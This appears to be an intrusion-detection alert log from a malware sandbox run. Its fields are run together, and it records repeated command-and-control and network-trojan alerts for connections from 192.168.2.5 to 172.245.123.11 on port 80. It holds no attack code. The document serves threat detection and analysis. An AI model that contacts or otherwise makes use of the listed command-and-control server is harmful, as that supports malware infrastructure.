                2025-01-07T11:03:38.582549+010020243181Malware Command and Control Activity Detected192.168.2.550121172.245.123.1180TCP
                2025-01-07T11:03:39.249186+010020243181Malware Command and Control Activity Detected192.168.2.550122172.245.123.1180TCP
                2025-01-07T11:03:39.917989+010020243181Malware Command and Control Activity Detected192.168.2.550123172.245.123.1180TCP
                2025-01-07T11:03:40.576758+010020243181Malware Command and Control Activity Detected192.168.2.550124172.245.123.1180TCP
                2025-01-07T11:03:41.226763+010020243181Malware Command and Control Activity Detected192.168.2.550125172.245.123.1180TCP
                2025-01-07T11:03:41.941183+010020243181Malware Command and Control Activity Detected192.168.2.550126172.245.123.1180TCP
                2025-01-07T11:03:42.582157+010020243181Malware Command and Control Activity Detected192.168.2.550127172.245.123.1180TCP
                2025-01-07T11:03:43.230772+010020243181Malware Command and Control Activity Detected192.168.2.550128172.245.123.1180TCP
                2025-01-07T11:03:43.883877+010020243181Malware Command and Control Activity Detected192.168.2.550129172.245.123.1180TCP
                2025-01-07T11:03:44.565510+010020243181Malware Command and Control Activity Detected192.168.2.550130172.245.123.1180TCP
                2025-01-07T11:03:45.213830+010020243181Malware Command and Control Activity Detected192.168.2.550131172.245.123.1180TCP
                2025-01-07T11:03:45.873777+010020243181Malware Command and Control Activity Detected192.168.2.550132172.245.123.1180TCP
                2025-01-07T11:03:46.508415+010020243181Malware Command and Control Activity Detected192.168.2.550133172.245.123.1180TCP
                2025-01-07T11:03:47.253639+010020243181Malware Command and Control Activity Detected192.168.2.550134172.245.123.1180TCP
                2025-01-07T11:03:47.940009+010020243181Malware Command and Control Activity Detected192.168.2.550135172.245.123.1180TCP
                2025-01-07T11:03:48.599995+010020243181Malware Command and Control Activity Detected192.168.2.550136172.245.123.1180TCP
                2025-01-07T11:03:49.272186+010020243181Malware Command and Control Activity Detected192.168.2.550137172.245.123.1180TCP
                2025-01-07T11:03:49.952988+010020243181Malware Command and Control Activity Detected192.168.2.550138172.245.123.1180TCP
                2025-01-07T11:03:50.591200+010020243181Malware Command and Control Activity Detected192.168.2.550139172.245.123.1180TCP
                2025-01-07T11:03:51.248033+010020243181Malware Command and Control Activity Detected192.168.2.550140172.245.123.1180TCP
                2025-01-07T11:03:51.922208+010020243181Malware Command and Control Activity Detected192.168.2.550141172.245.123.1180TCP
                2025-01-07T11:03:52.591519+010020243181Malware Command and Control Activity Detected192.168.2.550142172.245.123.1180TCP
                2025-01-07T11:03:53.254331+010020243181Malware Command and Control Activity Detected192.168.2.550143172.245.123.1180TCP
                2025-01-07T11:03:53.917456+010020243181Malware Command and Control Activity Detected192.168.2.550144172.245.123.1180TCP
                2025-01-07T11:03:54.583211+010020243181Malware Command and Control Activity Detected192.168.2.550145172.245.123.1180TCP
                2025-01-07T11:03:55.236735+010020243181Malware Command and Control Activity Detected192.168.2.550146172.245.123.1180TCP
                2025-01-07T11:03:55.875902+010020243181Malware Command and Control Activity Detected192.168.2.550147172.245.123.1180TCP
                2025-01-07T11:03:56.528237+010020243181Malware Command and Control Activity Detected192.168.2.550148172.245.123.1180TCP
                2025-01-07T11:03:57.196556+010020243181Malware Command and Control Activity Detected192.168.2.550149172.245.123.1180TCP
                2025-01-07T11:03:57.860803+010020243181Malware Command and Control Activity Detected192.168.2.550150172.245.123.1180TCP
                2025-01-07T11:03:58.560538+010020243181Malware Command and Control Activity Detected192.168.2.550151172.245.123.1180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:56.715463+010020216411A Network Trojan was detected192.168.2.549704172.245.123.1180TCP
                2025-01-07T11:01:57.382609+010020216411A Network Trojan was detected192.168.2.549705172.245.123.1180TCP
                2025-01-07T11:01:57.943923+010020216411A Network Trojan was detected192.168.2.549706172.245.123.1180TCP
                2025-01-07T11:01:58.646333+010020216411A Network Trojan was detected192.168.2.549708172.245.123.1180TCP
                2025-01-07T11:01:59.326148+010020216411A Network Trojan was detected192.168.2.549709172.245.123.1180TCP
                2025-01-07T11:01:59.975652+010020216411A Network Trojan was detected192.168.2.549710172.245.123.1180TCP
                2025-01-07T11:02:00.675299+010020216411A Network Trojan was detected192.168.2.549711172.245.123.1180TCP
                2025-01-07T11:02:01.372775+010020216411A Network Trojan was detected192.168.2.549712172.245.123.1180TCP
                2025-01-07T11:02:02.102743+010020216411A Network Trojan was detected192.168.2.549714172.245.123.1180TCP
                2025-01-07T11:02:02.801547+010020216411A Network Trojan was detected192.168.2.549715172.245.123.1180TCP
                2025-01-07T11:02:03.617744+010020216411A Network Trojan was detected192.168.2.549716172.245.123.1180TCP
                2025-01-07T11:02:04.247901+010020216411A Network Trojan was detected192.168.2.549717172.245.123.1180TCP
                2025-01-07T11:02:04.955089+010020216411A Network Trojan was detected192.168.2.549718172.245.123.1180TCP
                2025-01-07T11:02:05.693265+010020216411A Network Trojan was detected192.168.2.549719172.245.123.1180TCP
                2025-01-07T11:02:06.454475+010020216411A Network Trojan was detected192.168.2.549720172.245.123.1180TCP
                2025-01-07T11:02:07.167908+010020216411A Network Trojan was detected192.168.2.549721172.245.123.1180TCP
                2025-01-07T11:02:07.855998+010020216411A Network Trojan was detected192.168.2.549722172.245.123.1180TCP
                2025-01-07T11:02:08.543768+010020216411A Network Trojan was detected192.168.2.549723172.245.123.1180TCP
                2025-01-07T11:02:09.203966+010020216411A Network Trojan was detected192.168.2.549724172.245.123.1180TCP
                2025-01-07T11:02:09.860003+010020216411A Network Trojan was detected192.168.2.549725172.245.123.1180TCP
                2025-01-07T11:02:10.546688+010020216411A Network Trojan was detected192.168.2.549727172.245.123.1180TCP
                2025-01-07T11:02:11.233719+010020216411A Network Trojan was detected192.168.2.549730172.245.123.1180TCP
                2025-01-07T11:02:11.958150+010020216411A Network Trojan was detected192.168.2.549732172.245.123.1180TCP
                2025-01-07T11:02:12.617821+010020216411A Network Trojan was detected192.168.2.549734172.245.123.1180TCP
                2025-01-07T11:02:13.258855+010020216411A Network Trojan was detected192.168.2.549736172.245.123.1180TCP
                2025-01-07T11:02:13.915720+010020216411A Network Trojan was detected192.168.2.549738172.245.123.1180TCP
                2025-01-07T11:02:14.575614+010020216411A Network Trojan was detected192.168.2.549739172.245.123.1180TCP
                2025-01-07T11:02:15.241631+010020216411A Network Trojan was detected192.168.2.549740172.245.123.1180TCP
                2025-01-07T11:02:15.898264+010020216411A Network Trojan was detected192.168.2.549741172.245.123.1180TCP
                2025-01-07T11:02:16.561248+010020216411A Network Trojan was detected192.168.2.549742172.245.123.1180TCP
                2025-01-07T11:02:17.278413+010020216411A Network Trojan was detected192.168.2.549748172.245.123.1180TCP
                2025-01-07T11:02:17.961173+010020216411A Network Trojan was detected192.168.2.549754172.245.123.1180TCP
                2025-01-07T11:02:18.640081+010020216411A Network Trojan was detected192.168.2.549760172.245.123.1180TCP
                2025-01-07T11:02:19.327075+010020216411A Network Trojan was detected192.168.2.549766172.245.123.1180TCP
                2025-01-07T11:02:20.043059+010020216411A Network Trojan was detected192.168.2.549772172.245.123.1180TCP
                2025-01-07T11:02:20.742103+010020216411A Network Trojan was detected192.168.2.549778172.245.123.1180TCP
                2025-01-07T11:02:21.431219+010020216411A Network Trojan was detected192.168.2.549784172.245.123.1180TCP
                2025-01-07T11:02:22.122622+010020216411A Network Trojan was detected192.168.2.549790172.245.123.1180TCP
                2025-01-07T11:02:22.801706+010020216411A Network Trojan was detected192.168.2.549795172.245.123.1180TCP
                2025-01-07T11:02:23.524470+010020216411A Network Trojan was detected192.168.2.549801172.245.123.1180TCP
                2025-01-07T11:02:24.248034+010020216411A Network Trojan was detected192.168.2.549804172.245.123.1180TCP
                2025-01-07T11:02:24.981285+010020216411A Network Trojan was detected192.168.2.549810172.245.123.1180TCP
                2025-01-07T11:02:25.670616+010020216411A Network Trojan was detected192.168.2.549815172.245.123.1180TCP
                2025-01-07T11:02:26.424356+010020216411A Network Trojan was detected192.168.2.549821172.245.123.1180TCP
                2025-01-07T11:02:27.144150+010020216411A Network Trojan was detected192.168.2.549828172.245.123.1180TCP
                2025-01-07T11:02:27.947960+010020216411A Network Trojan was detected192.168.2.549834172.245.123.1180TCP
                2025-01-07T11:02:28.637968+010020216411A Network Trojan was detected192.168.2.549839172.245.123.1180TCP
                2025-01-07T11:02:29.308443+010020216411A Network Trojan was detected192.168.2.549843172.245.123.1180TCP
                2025-01-07T11:02:30.085557+010020216411A Network Trojan was detected192.168.2.549849172.245.123.1180TCP
                2025-01-07T11:02:30.768828+010020216411A Network Trojan was detected192.168.2.549854172.245.123.1180TCP
                2025-01-07T11:02:31.465790+010020216411A Network Trojan was detected192.168.2.549860172.245.123.1180TCP
                2025-01-07T11:02:32.162958+010020216411A Network Trojan was detected192.168.2.549865172.245.123.1180TCP
                2025-01-07T11:02:33.125642+010020216411A Network Trojan was detected192.168.2.549872172.245.123.1180TCP
                2025-01-07T11:02:33.779104+010020216411A Network Trojan was detected192.168.2.549877172.245.123.1180TCP
                2025-01-07T11:02:34.503792+010020216411A Network Trojan was detected192.168.2.549883172.245.123.1180TCP
                2025-01-07T11:02:35.152174+010020216411A Network Trojan was detected192.168.2.549889172.245.123.1180TCP
                2025-01-07T11:02:35.829436+010020216411A Network Trojan was detected192.168.2.549895172.245.123.1180TCP
                2025-01-07T11:02:36.478731+010020216411A Network Trojan was detected192.168.2.549901172.245.123.1180TCP
                2025-01-07T11:02:37.135567+010020216411A Network Trojan was detected192.168.2.549907172.245.123.1180TCP
                2025-01-07T11:02:37.908206+010020216411A Network Trojan was detected192.168.2.549912172.245.123.1180TCP
                2025-01-07T11:02:38.589708+010020216411A Network Trojan was detected192.168.2.549915172.245.123.1180TCP
                2025-01-07T11:02:39.258110+010020216411A Network Trojan was detected192.168.2.549920172.245.123.1180TCP
                2025-01-07T11:02:39.972590+010020216411A Network Trojan was detected192.168.2.549926172.245.123.1180TCP
                2025-01-07T11:02:40.635703+010020216411A Network Trojan was detected192.168.2.549932172.245.123.1180TCP
                2025-01-07T11:02:41.303821+010020216411A Network Trojan was detected192.168.2.549934172.245.123.1180TCP
                2025-01-07T11:02:41.967237+010020216411A Network Trojan was detected192.168.2.549940172.245.123.1180TCP
                2025-01-07T11:02:42.625053+010020216411A Network Trojan was detected192.168.2.549946172.245.123.1180TCP
                2025-01-07T11:02:43.363394+010020216411A Network Trojan was detected192.168.2.549952172.245.123.1180TCP
                2025-01-07T11:02:44.019633+010020216411A Network Trojan was detected192.168.2.549958172.245.123.1180TCP
                2025-01-07T11:02:44.684154+010020216411A Network Trojan was detected192.168.2.549964172.245.123.1180TCP
                2025-01-07T11:02:45.507465+010020216411A Network Trojan was detected192.168.2.549969172.245.123.1180TCP
                2025-01-07T11:02:46.180115+010020216411A Network Trojan was detected192.168.2.549971172.245.123.1180TCP
                2025-01-07T11:02:46.851221+010020216411A Network Trojan was detected192.168.2.549976172.245.123.1180TCP
                2025-01-07T11:02:47.795111+010020216411A Network Trojan was detected192.168.2.549982172.245.123.1180TCP
                2025-01-07T11:02:48.451009+010020216411A Network Trojan was detected192.168.2.549987172.245.123.1180TCP
                2025-01-07T11:02:49.150118+010020216411A Network Trojan was detected192.168.2.549994172.245.123.1180TCP
                2025-01-07T11:02:49.806913+010020216411A Network Trojan was detected192.168.2.550000172.245.123.1180TCP
                2025-01-07T11:02:50.480746+010020216411A Network Trojan was detected192.168.2.550006172.245.123.1180TCP
                2025-01-07T11:02:51.210960+010020216411A Network Trojan was detected192.168.2.550009172.245.123.1180TCP
                2025-01-07T11:02:51.916359+010020216411A Network Trojan was detected192.168.2.550015172.245.123.1180TCP
                2025-01-07T11:02:52.618644+010020216411A Network Trojan was detected192.168.2.550020172.245.123.1180TCP
                2025-01-07T11:02:53.273172+010020216411A Network Trojan was detected192.168.2.550026172.245.123.1180TCP
                2025-01-07T11:02:53.936803+010020216411A Network Trojan was detected192.168.2.550032172.245.123.1180TCP
                2025-01-07T11:02:55.171759+010020216411A Network Trojan was detected192.168.2.550038172.245.123.1180TCP
                2025-01-07T11:02:55.829665+010020216411A Network Trojan was detected192.168.2.550044172.245.123.1180TCP
                2025-01-07T11:02:56.557892+010020216411A Network Trojan was detected192.168.2.550050172.245.123.1180TCP
                2025-01-07T11:02:57.234366+010020216411A Network Trojan was detected192.168.2.550055172.245.123.1180TCP
                2025-01-07T11:02:57.904891+010020216411A Network Trojan was detected192.168.2.550061172.245.123.1180TCP
                2025-01-07T11:02:58.574189+010020216411A Network Trojan was detected192.168.2.550066172.245.123.1180TCP
                2025-01-07T11:02:59.229112+010020216411A Network Trojan was detected192.168.2.550067172.245.123.1180TCP
                2025-01-07T11:02:59.900572+010020216411A Network Trojan was detected192.168.2.550068172.245.123.1180TCP
                2025-01-07T11:03:00.558517+010020216411A Network Trojan was detected192.168.2.550069172.245.123.1180TCP
                2025-01-07T11:03:01.212085+010020216411A Network Trojan was detected192.168.2.550070172.245.123.1180TCP
                2025-01-07T11:03:01.900649+010020216411A Network Trojan was detected192.168.2.550071172.245.123.1180TCP
                2025-01-07T11:03:02.675531+010020216411A Network Trojan was detected192.168.2.550072172.245.123.1180TCP
                2025-01-07T11:03:03.337291+010020216411A Network Trojan was detected192.168.2.550073172.245.123.1180TCP
                2025-01-07T11:03:04.013533+010020216411A Network Trojan was detected192.168.2.550074172.245.123.1180TCP
                2025-01-07T11:03:04.679878+010020216411A Network Trojan was detected192.168.2.550075172.245.123.1180TCP
                2025-01-07T11:03:05.319446+010020216411A Network Trojan was detected192.168.2.550076172.245.123.1180TCP
                2025-01-07T11:03:05.975970+010020216411A Network Trojan was detected192.168.2.550077172.245.123.1180TCP
                2025-01-07T11:03:06.639844+010020216411A Network Trojan was detected192.168.2.550078172.245.123.1180TCP
                2025-01-07T11:03:07.327650+010020216411A Network Trojan was detected192.168.2.550079172.245.123.1180TCP
                2025-01-07T11:03:08.132275+010020216411A Network Trojan was detected192.168.2.550080172.245.123.1180TCP
                2025-01-07T11:03:08.806380+010020216411A Network Trojan was detected192.168.2.550081172.245.123.1180TCP
                2025-01-07T11:03:09.459976+010020216411A Network Trojan was detected192.168.2.550082172.245.123.1180TCP
                2025-01-07T11:03:10.132210+010020216411A Network Trojan was detected192.168.2.550083172.245.123.1180TCP
                2025-01-07T11:03:10.788630+010020216411A Network Trojan was detected192.168.2.550084172.245.123.1180TCP
                2025-01-07T11:03:11.460089+010020216411A Network Trojan was detected192.168.2.550085172.245.123.1180TCP
                2025-01-07T11:03:12.127099+010020216411A Network Trojan was detected192.168.2.550086172.245.123.1180TCP
                2025-01-07T11:03:12.756187+010020216411A Network Trojan was detected192.168.2.550087172.245.123.1180TCP
                2025-01-07T11:03:13.399253+010020216411A Network Trojan was detected192.168.2.550088172.245.123.1180TCP
                2025-01-07T11:03:14.117177+010020216411A Network Trojan was detected192.168.2.550089172.245.123.1180TCP
                2025-01-07T11:03:14.771734+010020216411A Network Trojan was detected192.168.2.550090172.245.123.1180TCP
                2025-01-07T11:03:15.503726+010020216411A Network Trojan was detected192.168.2.550091172.245.123.1180TCP
                2025-01-07T11:03:16.146706+010020216411A Network Trojan was detected192.168.2.550092172.245.123.1180TCP
                2025-01-07T11:03:16.829444+010020216411A Network Trojan was detected192.168.2.550093172.245.123.1180TCP
                2025-01-07T11:03:17.571531+010020216411A Network Trojan was detected192.168.2.550094172.245.123.1180TCP
                2025-01-07T11:03:18.224687+010020216411A Network Trojan was detected192.168.2.550095172.245.123.1180TCP
                2025-01-07T11:03:18.881699+010020216411A Network Trojan was detected192.168.2.550096172.245.123.1180TCP
                2025-01-07T11:03:19.523285+010020216411A Network Trojan was detected192.168.2.550097172.245.123.1180TCP
                2025-01-07T11:03:20.196458+010020216411A Network Trojan was detected192.168.2.550098172.245.123.1180TCP
                2025-01-07T11:03:20.851457+010020216411A Network Trojan was detected192.168.2.550099172.245.123.1180TCP
                2025-01-07T11:03:21.507813+010020216411A Network Trojan was detected192.168.2.550100172.245.123.1180TCP
                2025-01-07T11:03:22.176021+010020216411A Network Trojan was detected192.168.2.550101172.245.123.1180TCP
                2025-01-07T11:03:23.213434+010020216411A Network Trojan was detected192.168.2.550102172.245.123.1180TCP
                2025-01-07T11:03:24.151005+010020216411A Network Trojan was detected192.168.2.550103172.245.123.1180TCP
                2025-01-07T11:03:24.824519+010020216411A Network Trojan was detected192.168.2.550104172.245.123.1180TCP
                2025-01-07T11:03:26.710640+010020216411A Network Trojan was detected192.168.2.550105172.245.123.1180TCP
                2025-01-07T11:03:27.380300+010020216411A Network Trojan was detected192.168.2.550106172.245.123.1180TCP
                2025-01-07T11:03:28.015736+010020216411A Network Trojan was detected192.168.2.550107172.245.123.1180TCP
                2025-01-07T11:03:28.703037+010020216411A Network Trojan was detected192.168.2.550108172.245.123.1180TCP
                2025-01-07T11:03:29.349451+010020216411A Network Trojan was detected192.168.2.550109172.245.123.1180TCP
                2025-01-07T11:03:30.026092+010020216411A Network Trojan was detected192.168.2.550110172.245.123.1180TCP
                2025-01-07T11:03:30.701445+010020216411A Network Trojan was detected192.168.2.550111172.245.123.1180TCP
                2025-01-07T11:03:31.406580+010020216411A Network Trojan was detected192.168.2.550112172.245.123.1180TCP
                2025-01-07T11:03:32.067627+010020216411A Network Trojan was detected192.168.2.550113172.245.123.1180TCP
                2025-01-07T11:03:32.733953+010020216411A Network Trojan was detected192.168.2.550114172.245.123.1180TCP
                2025-01-07T11:03:33.433270+010020216411A Network Trojan was detected192.168.2.550115172.245.123.1180TCP
                2025-01-07T11:03:34.782674+010020216411A Network Trojan was detected192.168.2.550116172.245.123.1180TCP
                2025-01-07T11:03:35.422766+010020216411A Network Trojan was detected192.168.2.550117172.245.123.1180TCP
                2025-01-07T11:03:36.111250+010020216411A Network Trojan was detected192.168.2.550118172.245.123.1180TCP
                2025-01-07T11:03:36.787347+010020216411A Network Trojan was detected192.168.2.550119172.245.123.1180TCP
                2025-01-07T11:03:37.443278+010020216411A Network Trojan was detected192.168.2.550120172.245.123.1180TCP
                2025-01-07T11:03:38.078880+010020216411A Network Trojan was detected192.168.2.550121172.245.123.1180TCP
                2025-01-07T11:03:38.720674+010020216411A Network Trojan was detected192.168.2.550122172.245.123.1180TCP
                2025-01-07T11:03:39.392736+010020216411A Network Trojan was detected192.168.2.550123172.245.123.1180TCP
                2025-01-07T11:03:40.062714+010020216411A Network Trojan was detected192.168.2.550124172.245.123.1180TCP
                2025-01-07T11:03:40.725262+010020216411A Network Trojan was detected192.168.2.550125172.245.123.1180TCP
                2025-01-07T11:03:41.427015+010020216411A Network Trojan was detected192.168.2.550126172.245.123.1180TCP
                2025-01-07T11:03:42.077854+010020216411A Network Trojan was detected192.168.2.550127172.245.123.1180TCP
                2025-01-07T11:03:42.718228+010020216411A Network Trojan was detected192.168.2.550128172.245.123.1180TCP
                2025-01-07T11:03:43.373897+010020216411A Network Trojan was detected192.168.2.550129172.245.123.1180TCP
                2025-01-07T11:03:44.064476+010020216411A Network Trojan was detected192.168.2.550130172.245.123.1180TCP
                2025-01-07T11:03:44.703993+010020216411A Network Trojan was detected192.168.2.550131172.245.123.1180TCP
                2025-01-07T11:03:45.361356+010020216411A Network Trojan was detected192.168.2.550132172.245.123.1180TCP
                2025-01-07T11:03:46.021356+010020216411A Network Trojan was detected192.168.2.550133172.245.123.1180TCP
                2025-01-07T11:03:46.728055+010020216411A Network Trojan was detected192.168.2.550134172.245.123.1180TCP
                2025-01-07T11:03:47.390462+010020216411A Network Trojan was detected192.168.2.550135172.245.123.1180TCP
                2025-01-07T11:03:48.079188+010020216411A Network Trojan was detected192.168.2.550136172.245.123.1180TCP
                2025-01-07T11:03:48.750749+010020216411A Network Trojan was detected192.168.2.550137172.245.123.1180TCP
                2025-01-07T11:03:49.450939+010020216411A Network Trojan was detected192.168.2.550138172.245.123.1180TCP
                2025-01-07T11:03:50.093929+010020216411A Network Trojan was detected192.168.2.550139172.245.123.1180TCP
                2025-01-07T11:03:50.740699+010020216411A Network Trojan was detected192.168.2.550140172.245.123.1180TCP
                2025-01-07T11:03:51.391659+010020216411A Network Trojan was detected192.168.2.550141172.245.123.1180TCP
                2025-01-07T11:03:52.063134+010020216411A Network Trojan was detected192.168.2.550142172.245.123.1180TCP
                2025-01-07T11:03:52.739569+010020216411A Network Trojan was detected192.168.2.550143172.245.123.1180TCP
                2025-01-07T11:03:53.390870+010020216411A Network Trojan was detected192.168.2.550144172.245.123.1180TCP
                2025-01-07T11:03:54.062572+010020216411A Network Trojan was detected192.168.2.550145172.245.123.1180TCP
                2025-01-07T11:03:54.718933+010020216411A Network Trojan was detected192.168.2.550146172.245.123.1180TCP
                2025-01-07T11:03:55.375592+010020216411A Network Trojan was detected192.168.2.550147172.245.123.1180TCP
                2025-01-07T11:03:56.016359+010020216411A Network Trojan was detected192.168.2.550148172.245.123.1180TCP
                2025-01-07T11:03:56.672622+010020216411A Network Trojan was detected192.168.2.550149172.245.123.1180TCP
                2025-01-07T11:03:57.344266+010020216411A Network Trojan was detected192.168.2.550150172.245.123.1180TCP
                2025-01-07T11:03:58.028337+010020216411A Network Trojan was detected192.168.2.550151172.245.123.1180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:56.715463+010028257661Malware Command and Control Activity Detected192.168.2.549704172.245.123.1180TCP
                2025-01-07T11:01:57.382609+010028257661Malware Command and Control Activity Detected192.168.2.549705172.245.123.1180TCP
                2025-01-07T11:01:57.943923+010028257661Malware Command and Control Activity Detected192.168.2.549706172.245.123.1180TCP
                2025-01-07T11:01:58.646333+010028257661Malware Command and Control Activity Detected192.168.2.549708172.245.123.1180TCP
                2025-01-07T11:01:59.326148+010028257661Malware Command and Control Activity Detected192.168.2.549709172.245.123.1180TCP
                2025-01-07T11:01:59.975652+010028257661Malware Command and Control Activity Detected192.168.2.549710172.245.123.1180TCP
                2025-01-07T11:02:00.675299+010028257661Malware Command and Control Activity Detected192.168.2.549711172.245.123.1180TCP
                2025-01-07T11:02:01.372775+010028257661Malware Command and Control Activity Detected192.168.2.549712172.245.123.1180TCP
                2025-01-07T11:02:02.102743+010028257661Malware Command and Control Activity Detected192.168.2.549714172.245.123.1180TCP
                2025-01-07T11:02:02.801547+010028257661Malware Command and Control Activity Detected192.168.2.549715172.245.123.1180TCP
                2025-01-07T11:02:03.617744+010028257661Malware Command and Control Activity Detected192.168.2.549716172.245.123.1180TCP
                2025-01-07T11:02:04.247901+010028257661Malware Command and Control Activity Detected192.168.2.549717172.245.123.1180TCP
                2025-01-07T11:02:04.955089+010028257661Malware Command and Control Activity Detected192.168.2.549718172.245.123.1180TCP
                2025-01-07T11:02:05.693265+010028257661Malware Command and Control Activity Detected192.168.2.549719172.245.123.1180TCP
                2025-01-07T11:02:06.454475+010028257661Malware Command and Control Activity Detected192.168.2.549720172.245.123.1180TCP
                2025-01-07T11:02:07.167908+010028257661Malware Command and Control Activity Detected192.168.2.549721172.245.123.1180TCP
                2025-01-07T11:02:07.855998+010028257661Malware Command and Control Activity Detected192.168.2.549722172.245.123.1180TCP
                2025-01-07T11:02:08.543768+010028257661Malware Command and Control Activity Detected192.168.2.549723172.245.123.1180TCP
                2025-01-07T11:02:09.203966+010028257661Malware Command and Control Activity Detected192.168.2.549724172.245.123.1180TCP
                2025-01-07T11:02:09.860003+010028257661Malware Command and Control Activity Detected192.168.2.549725172.245.123.1180TCP
                2025-01-07T11:02:10.546688+010028257661Malware Command and Control Activity Detected192.168.2.549727172.245.123.1180TCP
                2025-01-07T11:02:11.233719+010028257661Malware Command and Control Activity Detected192.168.2.549730172.245.123.1180TCP
                2025-01-07T11:02:11.958150+010028257661Malware Command and Control Activity Detected192.168.2.549732172.245.123.1180TCP
                2025-01-07T11:02:12.617821+010028257661Malware Command and Control Activity Detected192.168.2.549734172.245.123.1180TCP
                2025-01-07T11:02:13.258855+010028257661Malware Command and Control Activity Detected192.168.2.549736172.245.123.1180TCP
                2025-01-07T11:02:13.915720+010028257661Malware Command and Control Activity Detected192.168.2.549738172.245.123.1180TCP
                2025-01-07T11:02:14.575614+010028257661Malware Command and Control Activity Detected192.168.2.549739172.245.123.1180TCP
                2025-01-07T11:02:15.241631+010028257661Malware Command and Control Activity Detected192.168.2.549740172.245.123.1180TCP
                2025-01-07T11:02:15.898264+010028257661Malware Command and Control Activity Detected192.168.2.549741172.245.123.1180TCP
                2025-01-07T11:02:16.561248+010028257661Malware Command and Control Activity Detected192.168.2.549742172.245.123.1180TCP
                2025-01-07T11:02:17.278413+010028257661Malware Command and Control Activity Detected192.168.2.549748172.245.123.1180TCP
                2025-01-07T11:02:17.961173+010028257661Malware Command and Control Activity Detected192.168.2.549754172.245.123.1180TCP
                2025-01-07T11:02:18.640081+010028257661Malware Command and Control Activity Detected192.168.2.549760172.245.123.1180TCP
                2025-01-07T11:02:19.327075+010028257661Malware Command and Control Activity Detected192.168.2.549766172.245.123.1180TCP
                2025-01-07T11:02:20.043059+010028257661Malware Command and Control Activity Detected192.168.2.549772172.245.123.1180TCP
                2025-01-07T11:02:20.742103+010028257661Malware Command and Control Activity Detected192.168.2.549778172.245.123.1180TCP
                2025-01-07T11:02:21.431219+010028257661Malware Command and Control Activity Detected192.168.2.549784172.245.123.1180TCP
                2025-01-07T11:02:22.122622+010028257661Malware Command and Control Activity Detected192.168.2.549790172.245.123.1180TCP
                2025-01-07T11:02:22.801706+010028257661Malware Command and Control Activity Detected192.168.2.549795172.245.123.1180TCP
                2025-01-07T11:02:23.524470+010028257661Malware Command and Control Activity Detected192.168.2.549801172.245.123.1180TCP
                2025-01-07T11:02:24.248034+010028257661Malware Command and Control Activity Detected192.168.2.549804172.245.123.1180TCP
                2025-01-07T11:02:24.981285+010028257661Malware Command and Control Activity Detected192.168.2.549810172.245.123.1180TCP
                2025-01-07T11:02:25.670616+010028257661Malware Command and Control Activity Detected192.168.2.549815172.245.123.1180TCP
                2025-01-07T11:02:26.424356+010028257661Malware Command and Control Activity Detected192.168.2.549821172.245.123.1180TCP
                2025-01-07T11:02:27.144150+010028257661Malware Command and Control Activity Detected192.168.2.549828172.245.123.1180TCP
                2025-01-07T11:02:27.947960+010028257661Malware Command and Control Activity Detected192.168.2.549834172.245.123.1180TCP
                2025-01-07T11:02:28.637968+010028257661Malware Command and Control Activity Detected192.168.2.549839172.245.123.1180TCP
                2025-01-07T11:02:29.308443+010028257661Malware Command and Control Activity Detected192.168.2.549843172.245.123.1180TCP
                2025-01-07T11:02:30.085557+010028257661Malware Command and Control Activity Detected192.168.2.549849172.245.123.1180TCP
                2025-01-07T11:02:30.768828+010028257661Malware Command and Control Activity Detected192.168.2.549854172.245.123.1180TCP
                2025-01-07T11:02:31.465790+010028257661Malware Command and Control Activity Detected192.168.2.549860172.245.123.1180TCP
                2025-01-07T11:02:32.162958+010028257661Malware Command and Control Activity Detected192.168.2.549865172.245.123.1180TCP
                2025-01-07T11:02:33.125642+010028257661Malware Command and Control Activity Detected192.168.2.549872172.245.123.1180TCP
                2025-01-07T11:02:33.779104+010028257661Malware Command and Control Activity Detected192.168.2.549877172.245.123.1180TCP
                2025-01-07T11:02:34.503792+010028257661Malware Command and Control Activity Detected192.168.2.549883172.245.123.1180TCP
                2025-01-07T11:02:35.152174+010028257661Malware Command and Control Activity Detected192.168.2.549889172.245.123.1180TCP
                2025-01-07T11:02:35.829436+010028257661Malware Command and Control Activity Detected192.168.2.549895172.245.123.1180TCP
                2025-01-07T11:02:36.478731+010028257661Malware Command and Control Activity Detected192.168.2.549901172.245.123.1180TCP
                2025-01-07T11:02:37.135567+010028257661Malware Command and Control Activity Detected192.168.2.549907172.245.123.1180TCP
                2025-01-07T11:02:37.908206+010028257661Malware Command and Control Activity Detected192.168.2.549912172.245.123.1180TCP
                2025-01-07T11:02:38.589708+010028257661Malware Command and Control Activity Detected192.168.2.549915172.245.123.1180TCP
                2025-01-07T11:02:39.258110+010028257661Malware Command and Control Activity Detected192.168.2.549920172.245.123.1180TCP
                2025-01-07T11:02:39.972590+010028257661Malware Command and Control Activity Detected192.168.2.549926172.245.123.1180TCP
                2025-01-07T11:02:40.635703+010028257661Malware Command and Control Activity Detected192.168.2.549932172.245.123.1180TCP
                2025-01-07T11:02:41.303821+010028257661Malware Command and Control Activity Detected192.168.2.549934172.245.123.1180TCP
                2025-01-07T11:02:41.967237+010028257661Malware Command and Control Activity Detected192.168.2.549940172.245.123.1180TCP
                2025-01-07T11:02:42.625053+010028257661Malware Command and Control Activity Detected192.168.2.549946172.245.123.1180TCP
                2025-01-07T11:02:43.363394+010028257661Malware Command and Control Activity Detected192.168.2.549952172.245.123.1180TCP
                2025-01-07T11:02:44.019633+010028257661Malware Command and Control Activity Detected192.168.2.549958172.245.123.1180TCP
                2025-01-07T11:02:44.684154+010028257661Malware Command and Control Activity Detected192.168.2.549964172.245.123.1180TCP
                2025-01-07T11:02:45.507465+010028257661Malware Command and Control Activity Detected192.168.2.549969172.245.123.1180TCP
                2025-01-07T11:02:46.180115+010028257661Malware Command and Control Activity Detected192.168.2.549971172.245.123.1180TCP
                2025-01-07T11:02:46.851221+010028257661Malware Command and Control Activity Detected192.168.2.549976172.245.123.1180TCP
                2025-01-07T11:02:47.795111+010028257661Malware Command and Control Activity Detected192.168.2.549982172.245.123.1180TCP
                2025-01-07T11:02:48.451009+010028257661Malware Command and Control Activity Detected192.168.2.549987172.245.123.1180TCP
                2025-01-07T11:02:49.150118+010028257661Malware Command and Control Activity Detected192.168.2.549994172.245.123.1180TCP
                2025-01-07T11:02:49.806913+010028257661Malware Command and Control Activity Detected192.168.2.550000172.245.123.1180TCP
                2025-01-07T11:02:50.480746+010028257661Malware Command and Control Activity Detected192.168.2.550006172.245.123.1180TCP
